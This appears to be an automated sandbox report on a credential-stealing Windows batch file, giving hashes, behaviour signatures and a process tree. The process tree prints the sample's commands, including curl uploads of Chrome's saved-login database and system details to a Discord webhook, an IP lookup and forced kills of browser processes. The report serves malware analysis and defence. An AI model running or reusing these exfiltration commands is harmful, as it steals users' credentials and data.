Analysis

  • max time kernel
    142s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/05/2024, 20:24

General

  • Target

    oran (2).bat

  • Size

    3KB

  • MD5

    751db7140d2911f5bfc65cf03b42252f

  • SHA1

    76ed57e4cf65e4735e916dc7d427f218191559c5

  • SHA256

    f17a109dff8890fa19ea9f4324c49daabf22d4b5c9386a1a819268f04eb9adeb

  • SHA512

    e46d6360e1753a3f809ae40873d5fcde355a1c2a2f2f7f6724bda1e4270ef616df9a00670551592439de5c14c00c94fc2be2e7581f3f391db17cac770eae2090

Score
7/10

Malware Config

Signatures

  • Registers COM server for autorun 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Drops file in System32 directory 18 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\system32\fltMC.exe
      fltmc
      2⤵
        PID:4268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wmic os get LocalDateTime /VALUE 2>NUL
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3400
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic os get LocalDateTime /VALUE
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2140
      • C:\Windows\system32\timeout.exe
        timeout /t 1
        2⤵
        • Delays execution with timeout.exe
        PID:3884
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -c "[guid]::NewGuid().ToString()"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -c "[guid]::NewGuid().ToString()"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:908
      • C:\Windows\system32\dxdiag.exe
        dxdiag /dontskip /whql:off /64bit /t c:\dxdiag.txt
        2⤵
        • Registers COM server for autorun
        • Drops file in System32 directory
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:1460
      • C:\Windows\system32\curl.exe
        curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\":\"g:b2af19bf-449f-4d89-9b01-30774846a846\"}" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
        2⤵
          PID:636
        • C:\Windows\system32\curl.exe
          curl -F "file1=@c:\dxdiag.txt" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
          2⤵
            PID:4988
          • C:\Windows\system32\curl.exe
            curl -F "file1=@C:\Users\Admin\Appdata\Local\Google\Chrome\User Data\Default\Login Data" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
            2⤵
              PID:4004
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c curl ifcfg.me
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:548
              • C:\Windows\system32\curl.exe
                curl ifcfg.me
                3⤵
                  PID:3164
              • C:\Windows\system32\curl.exe
                curl -o x.txt -X POST -H "Content-type: text/plain" --data 191.101.209.39 https://api.thebase64.com/encode?secret=your_secret
                2⤵
                  PID:2300
                • C:\Windows\system32\curl.exe
                  curl -F "[email protected]" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
                  2⤵
                    PID:3060
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM explorer.exe :: restart
                    2⤵
                    • Kills process with taskkill
                    PID:4956
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM chrome.exe :: restart
                    2⤵
                    • Kills process with taskkill
                    PID:100
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM discord.exe :: restart
                    2⤵
                    • Kills process with taskkill
                    PID:2392
                  • C:\Windows\system32\calc.exe
                    calc.exe :: restart
                    2⤵
                    • Modifies registry class
                    PID:1008
                  • C:\Windows\system32\notepad.exe
                    notepad.exe :: restart
                    2⤵
                      PID:988
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4240 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
                    1⤵
                      PID:2928
                    • C:\Windows\system32\OpenWith.exe
                      C:\Windows\system32\OpenWith.exe -Embedding
                      1⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:4400

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_seplbejy.aym.ps1

                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\AppData\Local\Temp\x.txt

                      Filesize

                      33B

                      MD5

                      69a7bf89dc20b524780cbb7447e34e9f

                      SHA1

                      b824ed67b6741a0a94b8f2cc89449f3b783fb9de

                      SHA256

                      b36eceb65ade81a9c859af73ce6cfa2a756c85cc9461d523df36546fadd32d44

                      SHA512

                      f1ae5eabecaa4b15c2d9b38f6565c48636b6bc1a70fae4a2aa5b4d7b1215d886663b6a2f9c813fb1ef7af3b467cd3fe3bb5276c12b01aa07087237dd373fa780

                    • \??\c:\dxdiag.txt

                      Filesize

                      86KB

                      MD5

                      14f366966c1763605aa6939cfe9ea0cd

                      SHA1

                      86b247165b6dda23a8fe57541c5f5db1f35ed901

                      SHA256

                      c0915a684ece3e7ab8c60a9787fa1a81a8c492ab0041af0a8e6b9ff1618efafa

                      SHA512

                      538fda37a1245ed5bf9f4dfbdb032ac732f50af201a37febf9abb640d7b9b1b5f982084655fa37156fa290baccd37a55da864b6e20fb0628bcbec815794c1bdd

                    • memory/908-1-0x00007FF8A2163000-0x00007FF8A2165000-memory.dmp

                      Filesize

                      8KB

                    • memory/908-11-0x00000194EC170000-0x00000194EC192000-memory.dmp

                      Filesize

                      136KB

                    • memory/908-14-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/908-15-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/1460-22-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-17-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-28-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-27-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-26-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-25-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-24-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-23-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-18-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1460-16-0x00000139051B0000-0x00000139051B1000-memory.dmp

                      Filesize

                      4KB